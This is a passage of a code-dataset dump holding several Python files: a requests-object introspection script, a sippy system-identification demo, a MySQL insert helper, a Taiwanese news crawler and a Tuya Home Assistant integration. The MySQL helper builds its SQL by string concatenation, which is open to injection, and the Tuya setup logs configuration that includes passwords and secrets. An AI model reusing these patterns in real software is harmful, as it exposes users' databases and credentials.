"usage_type": "call"}, {"api_name": "os.path", "line_number": 371, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 371, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 375, "usage_type": "call"}, {"api_name": "os.path", "line_number": 375, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 390, "usage_type": "call"}, {"api_name": "msgpack.load", "line_number": 395, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 401, "usage_type": "call"}, {"api_name": "os.path", "line_number": 401, "usage_type": "attribute"}, {"api_name": "os.path.commonprefix", "line_number": 428, "usage_type": "call"}, {"api_name": "os.path", "line_number": 428, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 430, "usage_type": "call"}, {"api_name": "os.path", "line_number": 430, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 431, "usage_type": "call"}, {"api_name": "os.path", "line_number": 431, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 435, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 435, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 442, "usage_type": "call"}, {"api_name": "os.path", "line_number": 442, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 448, "usage_type": "call"}, {"api_name": "os.path", "line_number": 448, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 450, "usage_type": "call"}, {"api_name": "os.path", "line_number": 450, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 463, "usage_type": "call"}, {"api_name": "os.path", "line_number": 463, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 464, "usage_type": "call"}, {"api_name": "os.path", "line_number": 464, "usage_type": "attribute"}, {"api_name": "os.path.commonprefix", "line_number": 467, "usage_type": "call"}, {"api_name": "os.path", "line_number": 467, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 470, "usage_type": "call"}, {"api_name": "os.path", "line_number": 470, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 473, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 473, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 480, "usage_type": "call"}, {"api_name": "os.path", "line_number": 480, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 482, "usage_type": "call"}, {"api_name": "os.path", "line_number": 482, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 490, "usage_type": "call"}, {"api_name": "os.path", "line_number": 490, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 492, "usage_type": "call"}]} +{"seq_id": "10574934", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 30 23:44:53 2019\n\n@author: root\n\"\"\"\n\nimport requests\n\nurl='https://docs.python.org/3/library/functions.html' # ----------< INPUT >\n\nr = requests.get(url) # use try catch # MY RESEARCH : \"OBJECT\" r\n\n## -----ANALYSE request object 'r' \nalldirs = dir(r) #list\nallvars = vars(r) #dictionary\n#. type\n#. id\n#. \n\n\"\"\"\ntype() :type of object\ndir() :set of attributes\nid()\ngetattr()\nhasattr()\nglobals()\nlocals()\ncallable()\n\"\"\"\n\n\n# -----< alldirs >---creating command strings (to read objects of [alldirs]\ncommand = list()\nfor i in range(0,len(alldirs)):\n command.append('r.' + str(alldirs[i]))\n\n#### -- HOW DO I RANDOMLY EXECUTE A COMMAND FROM THE ENTIRE LIST???\n# >>>>>> ACCESSING OBJECT 'r' with r.--\n #input('ACommandPress key for next..')\n print(eval(command[i]))\n input('->')\n \n # OR\n# ---------------< RUN till here to test >---- \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n \n \n \n\"\"\" \n## Modify try ----< OOP > --- Do I need it ???? \n#--------< first look into the obhect >\nclass Obj1stLook():\n \n def __init__(self,obj):\n self.obj = obj\n print(\"Object type:\\n\", type(self.obj))\n \n # ------------< if a \"requests object\" >-\n\n def lookin(self):\n #return \"Object type:\\n{} \\n\\n Object content:\\n{} \\n\\n Object id: \\n{}\".format(type(self.obj), dir(self.obj), id(self.obj))\n print(dir(self.obj))\n #print(id(self.obj)\n #self.getattr =getattr(self.obj)\n #self.hasattr =hasattr(self.obj)\n #self.globals =globals(self.obj)\n #self.locals =locals(self.obj)\n #self.callable =callable(self.obj)\n\n #def createCommand(self):#self.dir):\n # print(self.dir)\n \nx = Obj1stLook(r)\n\"\"\"\n\n##--------- other paradigm\ndef lookin(obj):\n return \"Object type: {} |||| Object content: {} |||| Object id: {}\" \\\n .format(type(obj), dir(obj), id(obj))\n #print(dir(self.obj))\n #print(id(self.obj)\n #self.getattr =getattr(self.obj)\n #self.hasattr =hasattr(self.obj)\n #self.globals =globals(self.obj)\n #self.locals =locals(self.obj)\n #self.callable =callable(self.obj)", "sub_path": "_requestsWWW.ai.dev/10413www/_webpageanatomy.py", "file_name": "_webpageanatomy.py", "file_ext": "py", "file_size_in_byte": 2425, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "237263580", "text": "\nimport numpy as np\nimport pandas as pd\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nfrom sippy import *\nimport plots\n# %\n#load spteptest data from a TSV file\nfile = r'data\\PC_Data_shifted.csv'\nstep_test_data = pd.read_csv(file,index_col='Time', parse_dates=True, skiprows=[1,2])\n#slice data for model identification case\nstart = '09/30/2012 09:00:00'\nstop = '09/30/2012 12:20:10'\nidinput = step_test_data.loc[start:stop].copy()\n\n#select Inputs and Outputs for the model identification case\ninputs = ['Fuel','Fan', 'Feed']\noutputs = ['Temp', 'O2']\n\n# Create FIR filter to detrend signal \n\nts = pd.Timedelta(step_test_data.index[1] - step_test_data.index[0]).total_seconds() # data sampling time\ntss = 3\ntss_sec = tss * 60\nmult_factor = 3\nfilt_tss = tss_sec * mult_factor\ncutoff = 1/2/filt_tss\npass_zero= 'lowpass'\nnyq_rate = ts/2.0\nwidth = 0.5/nyq_rate\nripple_db =65\nN,beta =signal.kaiserord(ripple_db,width)\nwindow = ('kaiser',beta)\ncoef = signal.firwin(numtaps=N, cutoff=cutoff, window=window, pass_zero=pass_zero, nyq = nyq_rate)\n# plots.plot_freuency_response(coef)\ntrend = signal.filtfilt(coef, 1.0,idinput, axis=0)\nidinput = idinput - trend\n\nu = idinput[inputs].to_numpy().T\ny = idinput[outputs].to_numpy().T\nprint('Output shape:', y.shape)\nprint('Input shape:',u.shape)\n \n#specify model identification parameters, reffer the documentation for detais.\nmodel = 'Precalciner.npz' #model file name\nmethod='CVA'\nIC = 'AIC' # None, AIC, AICc, BIC\nTH = 30 # The length of time horizon used for regression\nfix_ordr = 35 # Used if and only if IC = 'None'\nmax_order = 25 # Used if IC = AIC, AICc or BIC\nreq_D = False\nforce_A_stable = False\n\nsys_id = system_identification(\n y, \n u, \n method,\n SS_fixed_order=fix_ordr,\n SS_max_order=max_order,\n IC=IC,\n SS_f=TH,\n SS_p=TH,\n SS_D_required=req_D,\n SS_A_stability=force_A_stable\n )\n\n#print model order\n# print('Model order:', sys_id.n)\n\n#save model parameters A, B, C,D and X0 as npz file\nnp.savez(model, A=sys_id.A, B=sys_id.B, C=sys_id.C, D=sys_id.D, K=sys_id.K, X0=sys_id.x0)\nplots.plot_model(model, inputs, outputs, tss_sec, ts)\n\nstart_time = start\nend_time = stop\npad_len = 30 #int(tss_sec/ts*0.8)\nplots.plot_comparison(step_test_data, model, pad_len, inputs, outputs, start_time, end_time, plt_input=False)", "sub_path": "scripts/demo_PC.py", "file_name": "demo_PC.py", "file_ext": "py", "file_size_in_byte": 2299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.signal.kaiserord", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 33, "usage_type": "name"}, {"api_name": "scipy.signal.firwin", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 35, "usage_type": "name"}, {"api_name": "scipy.signal.filtfilt", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.savez", "line_number": 72, "usage_type": "call"}, {"api_name": "plots.plot_model", "line_number": 73, "usage_type": "call"}, {"api_name": "plots.plot_comparison", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "332746557", "text": "from DBSelectQueries import DBSelectQueries as DBSel\r\nfrom FileUtils import get_file_names_from_folder, read_json_file\r\nimport re\r\nimport logging\r\n\r\n\r\nclass DBItemAdder:\r\n\r\n @staticmethod\r\n def sql_insert_used_photos(connection, photo_id):\r\n table_name = \"used_photos\"\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `\"+table_name+\"`(`PhotoID`) VALUES ('\" + str(photo_id) + \"')\"\r\n cursor.execute(sql)\r\n connection.commit()\r\n\r\n @staticmethod\r\n def sql_insert_photo(connection, filename, file_extension, description):\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `photos`(`PhotoID`, `filename`, `file extension`, `description`)\" + \\\r\n \"VALUES (null,'\"+filename+\"','\"+file_extension\r\n\r\n if description is None:\r\n sql = sql + \"', null )\"\r\n else:\r\n sql = sql + \"','\" + description + \" ')\"\r\n\r\n try:\r\n cursor.execute(sql)\r\n except Exception as e:\r\n logging.warning(\"Exception is :\" + str(e) + \"\\n\"+filename+\"\\n\"+file_extension+\"\\n\"+description)\r\n\r\n connection.commit()\r\n\r\n @staticmethod\r\n def sql_assign_photo_to_artist(connection, photo_id, artist_id):\r\n table_name = \"photos_to_artists\"\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `\" + table_name + \"`(`PhotoID`, `ArtistID`)\" + \\\r\n \" VALUES ('\"+str(photo_id)+\"','\" + str(artist_id) + \"')\"\r\n cursor.execute(sql)\r\n connection.commit()\r\n\r\n @staticmethod\r\n def sql_assign_photo_to_genres(connection, photo_id, genre_id):\r\n table_name = \"photos_to_genres\"\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `\" + table_name + \"`(`PhotoID`, `GenreID`)\" + \\\r\n \" VALUES ('\"+str(photo_id)+\"','\" + str(genre_id) + \"')\"\r\n cursor.execute(sql)\r\n connection.commit()\r\n\r\n @staticmethod\r\n def sql_insert_artist(connection, NameSurname, websiteURL, artstationURL, deviantartURL, InstagramURL, TumblrURL):\r\n table_name = \"artists\"\r\n with connection.cursor() as cursor:\r\n sql = \"INSERT INTO `\"+table_name+\"`\" \\\r\n \"(`ArtistID`, `NameSurname`, `websiteURL`, `artstationURL`, `deviantartURL`, `InstagramURL`, `TumblrURL`)\"+\\\r\n \" VALUES (null,'\"+NameSurname+\"','\"+websiteURL+\"','\"+artstationURL+\"','\"+deviantartURL+\"','\"+InstagramURL+\"','\"+TumblrURL+\"')\"\r\n cursor.execute(sql)\r\n connection.commit()\r\n", "sub_path": "DBItemAdder.py", "file_name": "DBItemAdder.py", "file_ext": "py", "file_size_in_byte": 2583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.warning", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "617874226", "text": "# local Django\nfrom newsdb.models import New\n\n# third-party\nfrom bs4 import BeautifulSoup\nimport requests\nimport pytz\n\n# standard library\nfrom datetime import datetime, date\nimport re\n\nclass NewtalkCrawler:\n\n def __init__(self):\n self.subjects = {\n '2/政治': 2,\n '1/國際': 3,\n '4/司法': 1,\n '14/社會': 1,\n '3/財經': 4,\n '7/中國': 6,\n '5/生活': 7,\n '102/體育': 5,\n }\n\n def get_news_info (self, url, sub, date):\n soup = self.get_news_soup(url)\n if soup != None:\n return {\n 'brand_id': 15,\n 'sub_id': self.subjects[sub],\n 'url': url,\n 'title': self.get_title(soup),\n 'content': self.get_content(soup),\n 'date': date,\n 'author': self.get_author(soup),\n }\n else:\n return None\n\n def get_news_soup (self, url):\n try:\n res = requests.get(url, timeout=10, headers={'User-Agent': 'Mozilla/5.0'})\n res.encoding = res.apparent_encoding\n soup = BeautifulSoup(res.text, 'lxml')\n return soup\n except:\n print( 'error in get_news_soup' )\n return None\n\n def get_title (self, soup):\n try:\n title = soup.find('h1', class_='content_title').get_text()\n return \"\".join( title.split() )\n except:\n return None\n\n def get_author (self, soup):\n try:\n author = soup.find('div', class_='content_reporter').find('a').get_text()\n return author\n except:\n return None\n\n def get_content (self, soup):\n try:\n news_DOM = soup.find('div', {'itemprop': 'articleBody'}).contents\n content = ''\n for DOM in news_DOM:\n if DOM.name == 'p':\n content += DOM.get_text()\n return \"\".join( content.split() )[:2000]\n except Exception as e:\n print( 'error in get_content' )\n print(e)\n return None\n\n def get_url_by_date(self, sub, date):\n flag = True\n url_category = []\n for page in range(1, 10):\n try:\n res = requests.get('https://newtalk.tw/news/subcategory/%s/%d' % (sub, page), timeout=10, headers={'User-Agent': 'Mozilla/5.0'})\n res.encoding = res.apparent_encoding\n soup = BeautifulSoup(res.text, 'lxml')\n except Exception as e:\n print( e )\n print( 'error in get news categoty' )\n continue\n\n news_category_DOM = soup.find_all('div', class_='news_box1')\n for news_DOM in news_category_DOM:\n try:\n url = news_DOM.find('div', class_='news-title').find('a')['href']\n news_date = re.search( r'https://newtalk.tw/news/(.*)/(.*)/(.*)', url ).group(2)\n\n if datetime.strptime(news_date, '%Y-%m-%d').date() > date:\n continue\n elif datetime.strptime(news_date, '%Y-%m-%d').date() == date:\n url_category.append( url )\n else:\n flag = False\n break\n\n except Exception as e:\n print( 'error in crawling news category' )\n print( e )\n continue\n \n if flag == False:\n break\n\n news_category_DOM = soup.find('div', id='category').find_all('div', class_='news-list-item')\n for news_DOM in news_category_DOM:\n try:\n url = news_DOM.find('div', class_='news_title').find('a')['href']\n news_date = re.search( r'https://newtalk.tw/news/(.*)/(.*)/(.*)', url ).group(2)\n\n if datetime.strptime(news_date, '%Y-%m-%d').date() > date:\n continue\n elif datetime.strptime(news_date, '%Y-%m-%d').date() == date:\n url_category.append( url )\n else:\n flag = False\n break\n\n except Exception as e:\n print( 'error in crawling news gategory' )\n print( e )\n continue\n \n if flag == False:\n break\n return url_category\n\n def get_news_today( self ):\n timezone = pytz.timezone('Asia/Taipei')\n date_today = datetime.now(timezone).date()\n\n return self.get_news_by_date( [str(date_today)] )\n\n def get_news_by_date(self, date_list):\n news_list = []\n for date in date_list:\n for sub in self.subjects:\n url_list = self.get_url_by_date( sub, datetime.strptime(date, '%Y-%m-%d').date() )\n for url in url_list:\n temp_news = self.get_news_info( url, sub, str(date) )\n news_list.append( temp_news )\n\n return news_list\n\n def insert_news( self, newsList ):\n for news in newsList:\n try:\n temp_news = New.objects.filter(url=news['url'])\n if len(temp_news) == 0:\n tmp = New(\n title=news['title'],\n content= news['content'],\n author= news['author'],\n brand_id=news['brand_id'],\n sub_id= news['sub_id'],\n date=news['date'],\n url=news['url'],\n )\n tmp.save()\n except Exception as e:\n print( e )\n return True", "sub_path": "DisInV/crawler/dimestic_news_apis/newtalk_api.py", "file_name": "newtalk_api.py", "file_ext": "py", "file_size_in_byte": 5831, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.date", "line_number": 36, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 84, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 86, "usage_type": "call"}, {"api_name": "re.search", "line_number": 96, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 98, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 100, "usage_type": "name"}, {"api_name": "re.search", "line_number": 118, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 120, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 122, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 138, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 145, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 147, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 147, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 149, "usage_type": "argument"}, {"api_name": "newsdb.models.New.objects.filter", "line_number": 157, "usage_type": "call"}, {"api_name": "newsdb.models.New.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "newsdb.models.New", "line_number": 157, "usage_type": "name"}, {"api_name": "newsdb.models.New", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "159385604", "text": "#!/usr/bin/env python3\n\"\"\"Support for Tuya Smart devices.\"\"\"\n\nimport itertools\nimport logging\nfrom typing import Any\n\nfrom tuya_iot import (\n ProjectType,\n TuyaDevice,\n TuyaDeviceListener,\n TuyaDeviceManager,\n TuyaHomeManager,\n TuyaOpenAPI,\n TuyaOpenMQ,\n tuya_logger,\n)\nimport voluptuous as vol\n\nfrom homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry\nfrom homeassistant.core import HomeAssistant\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\n\nfrom .const import (\n CONF_ACCESS_ID,\n CONF_ACCESS_SECRET,\n CONF_APP_TYPE,\n CONF_COUNTRY_CODE,\n CONF_ENDPOINT,\n CONF_PASSWORD,\n CONF_PROJECT_TYPE,\n CONF_USERNAME,\n DOMAIN,\n TUYA_DEVICE_MANAGER,\n TUYA_DISCOVERY_NEW,\n TUYA_HA_DEVICES,\n TUYA_HA_TUYA_MAP,\n TUYA_MQTT_LISTENER,\n TUYA_SETUP_PLATFORM,\n TUYA_SUPPORT_HA_TYPE,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nCONFIG_SCHEMA = vol.Schema(\n vol.All(\n cv.deprecated(DOMAIN),\n {\n DOMAIN: vol.Schema(\n {\n vol.Required(CONF_PROJECT_TYPE): int,\n vol.Required(CONF_ENDPOINT): cv.string,\n vol.Required(CONF_ACCESS_ID): cv.string,\n vol.Required(CONF_ACCESS_SECRET): cv.string,\n CONF_USERNAME: cv.string,\n CONF_PASSWORD: cv.string,\n CONF_COUNTRY_CODE: cv.string,\n CONF_APP_TYPE: cv.string,\n }\n )\n },\n ),\n extra=vol.ALLOW_EXTRA,\n)\n\n\nasync def _init_tuya_sdk(hass: HomeAssistant, entry: ConfigEntry) -> bool:\n entry_data = entry.data\n project_type = ProjectType(entry_data[CONF_PROJECT_TYPE])\n api = TuyaOpenAPI(\n entry_data[CONF_ENDPOINT],\n entry_data[CONF_ACCESS_ID],\n entry_data[CONF_ACCESS_SECRET],\n project_type,\n )\n\n api.set_dev_channel(\"hass\")\n\n response = (\n await hass.async_add_executor_job(\n api.login, entry_data[CONF_USERNAME], entry_data[CONF_PASSWORD]\n )\n if project_type == ProjectType.INDUSTY_SOLUTIONS\n else await hass.async_add_executor_job(\n api.login,\n entry_data[CONF_USERNAME],\n entry_data[CONF_PASSWORD],\n entry_data[CONF_COUNTRY_CODE],\n entry_data[CONF_APP_TYPE],\n )\n )\n if response.get(\"success\", False) is False:\n _LOGGER.error(\n f\"Tuya login error response: {response}\"\n )\n return False\n\n tuya_mq = TuyaOpenMQ(api)\n tuya_mq.start()\n\n device_manager = TuyaDeviceManager(api, tuya_mq)\n\n # Get device list\n home_manager = TuyaHomeManager(api, tuya_mq, device_manager)\n await hass.async_add_executor_job(home_manager.update_device_cache)\n\n class DeviceListener(TuyaDeviceListener):\n \"\"\"Device Update Listener.\"\"\"\n\n def update_device(self, device: TuyaDevice):\n for ha_device in hass.data[DOMAIN][TUYA_HA_DEVICES]:\n if ha_device.tuya_device.id == device.id:\n _LOGGER.debug(\n f\"_update-->{self};->>{ha_device.tuya_device.status}\"\n )\n ha_device.schedule_update_ha_state()\n\n def add_device(self, device: TuyaDevice):\n\n device_add = False\n\n _LOGGER.info(\n f\"\"\"add device category->{device.category}; keys->,\n {hass.data[DOMAIN][TUYA_HA_TUYA_MAP].keys()}\"\"\"\n )\n if device.category in itertools.chain(\n *hass.data[DOMAIN][TUYA_HA_TUYA_MAP].values()\n ):\n ha_tuya_map = hass.data[DOMAIN][TUYA_HA_TUYA_MAP]\n\n remove_hass_device(hass, device.id)\n\n for key, tuya_list in ha_tuya_map.items():\n if device.category in tuya_list:\n device_add = True\n async_dispatcher_send(\n hass, TUYA_DISCOVERY_NEW.format(key), [device.id]\n )\n\n if device_add:\n device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n device_manager.mq.stop()\n tuya_mq = TuyaOpenMQ(device_manager.api)\n tuya_mq.start()\n\n device_manager.mq = tuya_mq\n tuya_mq.add_message_listener(device_manager._onMessage)\n\n def remove_device(self, id: str):\n _LOGGER.info(f\"tuya remove device:{id}\")\n remove_hass_device(hass, id)\n\n __listener = DeviceListener()\n hass.data[DOMAIN][TUYA_MQTT_LISTENER] = __listener\n device_manager.add_device_listener(__listener)\n hass.data[DOMAIN][TUYA_DEVICE_MANAGER] = device_manager\n\n # Clean up device entities\n await cleanup_device_registry(hass)\n\n _LOGGER.info(f\"init support type->{TUYA_SUPPORT_HA_TYPE}\")\n\n for platform in TUYA_SUPPORT_HA_TYPE:\n _LOGGER.info(f\"tuya async platform-->{platform}\")\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(entry, platform)\n )\n hass.data[DOMAIN][TUYA_SETUP_PLATFORM].add(platform)\n\n return True\n\n\nasync def cleanup_device_registry(hass: HomeAssistant):\n \"\"\"Remove deleted device registry entry if there are no remaining entities.\"\"\"\n\n device_registry = hass.helpers.device_registry.async_get(hass)\n device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n\n for dev_id, device_entity in list(device_registry.devices.items()):\n for item in device_entity.identifiers:\n if DOMAIN == item[0] and item[1] not in device_manager.device_map.keys():\n device_registry.async_remove_device(dev_id)\n break\n\n\ndef remove_hass_device(hass: HomeAssistant, device_id: str):\n \"\"\"Remove device from hass cache.\"\"\"\n device_registry = hass.helpers.device_registry.async_get(hass)\n entity_registry = hass.helpers.entity_registry.async_get(hass)\n for entity in list(entity_registry.entities.values()):\n if entity.unique_id.startswith(f\"ty{device_id}\"):\n entity_registry.async_remove(entity.entity_id)\n if device_registry.async_get(entity.device_id):\n device_registry.async_remove_device(entity.device_id)\n\n\nasync def async_setup(hass, config):\n \"\"\"Set up the Tuya integration.\"\"\"\n tuya_logger.setLevel(_LOGGER.level)\n conf = config.get(DOMAIN)\n\n _LOGGER.info(f\"Tuya async setup conf {conf}\")\n if conf is not None:\n\n async def flow_init() -> Any:\n try:\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_IMPORT}, data=conf\n )\n except Exception as inst:\n _LOGGER.error(inst.args)\n _LOGGER.info(\"Tuya async setup flow_init\")\n return result\n\n hass.async_create_task(flow_init())\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):\n \"\"\"Unloading the Tuya platforms.\"\"\"\n _LOGGER.info(\"integration unload\")\n unload = await hass.config_entries.async_unload_platforms(\n entry, hass.data[DOMAIN][\"setup_platform\"]\n )\n if unload:\n __device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n __device_manager.mq.stop()\n __device_manager.remove_device_listener(hass.data[DOMAIN][TUYA_MQTT_LISTENER])\n\n hass.data.pop(DOMAIN)\n\n return unload\n\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):\n \"\"\"Async setup hass config entry.\"\"\"\n _LOGGER.info(f\"tuya.__init__.async_setup_entry-->{entry.data}\")\n\n hass.data[DOMAIN] = {TUYA_HA_TUYA_MAP: {}, TUYA_HA_DEVICES: []}\n hass.data[DOMAIN][TUYA_SETUP_PLATFORM] = set()\n\n success = await _init_tuya_sdk(hass, entry)\n if not success:\n return False\n\n return True\n", "sub_path": "custom_components/tuya_v2/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 7913, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 44, "usage_type": "call"}, {"api_name": "voluptuous.Schema", "line_number": 46, "usage_type": "call"}, {"api_name": "voluptuous.All", "line_number": 47, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.deprecated", "line_number": 48, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 48, "usage_type": "argument"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 48, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 50, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 50, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 52, "usage_type": "call"}, {"api_name": "const.CONF_PROJECT_TYPE", "line_number": 52, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 53, "usage_type": "call"}, {"api_name": "const.CONF_ENDPOINT", "line_number": 53, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 54, "usage_type": "call"}, {"api_name": "const.CONF_ACCESS_ID", "line_number": 54, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 55, "usage_type": "call"}, {"api_name": "const.CONF_ACCESS_SECRET", "line_number": 55, "usage_type": "argument"}, {"api_name": "const.CONF_USERNAME", "line_number": 56, "usage_type": "name"}, {"api_name": "const.CONF_PASSWORD", "line_number": 57, "usage_type": "name"}, {"api_name": "const.CONF_COUNTRY_CODE", "line_number": 58, "usage_type": "name"}, {"api_name": "const.CONF_APP_TYPE", "line_number": 59, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 53, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 53, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 54, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 54, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 55, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 55, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 56, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 56, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 57, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 57, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 58, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 58, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 59, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 59, "usage_type": "name"}, {"api_name": "voluptuous.ALLOW_EXTRA", "line_number": 64, "usage_type": "attribute"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 68, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 68, "usage_type": "name"}, {"api_name": "tuya_iot.ProjectType", "line_number": 70, "usage_type": "call"}, {"api_name": "const.CONF_PROJECT_TYPE", "line_number": 70, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaOpenAPI", "line_number": 71, "usage_type": "call"}, {"api_name": "const.CONF_ENDPOINT", "line_number": 72, "usage_type": "name"}, {"api_name": "const.CONF_ACCESS_ID", "line_number": 73, "usage_type": "name"}, {"api_name": "const.CONF_ACCESS_SECRET", "line_number": 74, "usage_type": "name"}, {"api_name": "tuya_iot.ProjectType.INDUSTY_SOLUTIONS", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tuya_iot.ProjectType", "line_number": 84, "usage_type": "name"}, {"api_name": "const.CONF_USERNAME", "line_number": 82, "usage_type": "name"}, {"api_name": "const.CONF_PASSWORD", "line_number": 82, "usage_type": "name"}, {"api_name": "const.CONF_USERNAME", "line_number": 87, "usage_type": "name"}, {"api_name": "const.CONF_PASSWORD", "line_number": 88, "usage_type": "name"}, {"api_name": "const.CONF_COUNTRY_CODE", "line_number": 89, "usage_type": "name"}, {"api_name": "const.CONF_APP_TYPE", "line_number": 90, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaOpenMQ", "line_number": 99, "usage_type": "call"}, {"api_name": "tuya_iot.TuyaDeviceManager", "line_number": 102, "usage_type": "call"}, {"api_name": "tuya_iot.TuyaHomeManager", "line_number": 105, "usage_type": "call"}, {"api_name": "tuya_iot.TuyaDeviceListener", "line_number": 108, "usage_type": "name"}, {"api_name": "tuya_iot.TuyaDevice", "line_number": 111, "usage_type": "name"}, {"api_name": 